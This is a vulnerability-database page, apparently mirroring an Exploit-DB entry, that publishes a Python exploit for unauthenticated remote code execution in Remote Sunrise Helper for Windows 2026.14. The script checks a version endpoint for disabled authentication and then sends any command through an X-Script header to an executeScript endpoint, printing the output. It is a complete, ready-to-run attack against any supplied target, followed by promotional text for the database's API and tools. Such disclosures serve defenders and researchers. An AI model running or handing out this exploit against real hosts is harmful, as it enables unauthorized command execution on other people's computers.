Lucene search
K

Remote Sunrise Helper for Windows 2026.14 - Remote Code Execution

🗓️ 15 May 2026 00:00:00Reported by Chokri HammediType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Unauthenticated remote code execution in Remote Sunrise Helper for Windows 2026.14.

Code
# Exploit Title: Remote Sunrise Helper for Windows 2026.14 -
Unauthenticated Remote Code Execution
# Date: 2026-04-20
# Exploit Author: Chokri Hammedi
# Software: https://rs.ltd/latest.php?os=win
# Vendor: https://rs.ltd/
# Version: 2026.14
# Tested on: Windows 10 / Windows 11


#!/usr/bin/env python3
import requests, json, sys, urllib3
urllib3.disable_warnings()

target = sys.argv[1]
cmd = sys.argv[2]
url = f"https://{target}:49762"
headers = {"X-HostName": "a", "X-ClientToken": "a", "X-HostFullModel": "a"}

r = requests.get(f"{url}/api/getVersion", verify=False, timeout=5)
data = r.json()

if data.get("requires.auth") == False:
    r = requests.post(f"{url}/api/executeScript", headers={**headers,
"X-Script": cmd}, verify=False)
    result = json.loads(r.text)
    print(result.get('result', result.get('error', '')))
else:
    print("[*] Not vulnerable - authentication required")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation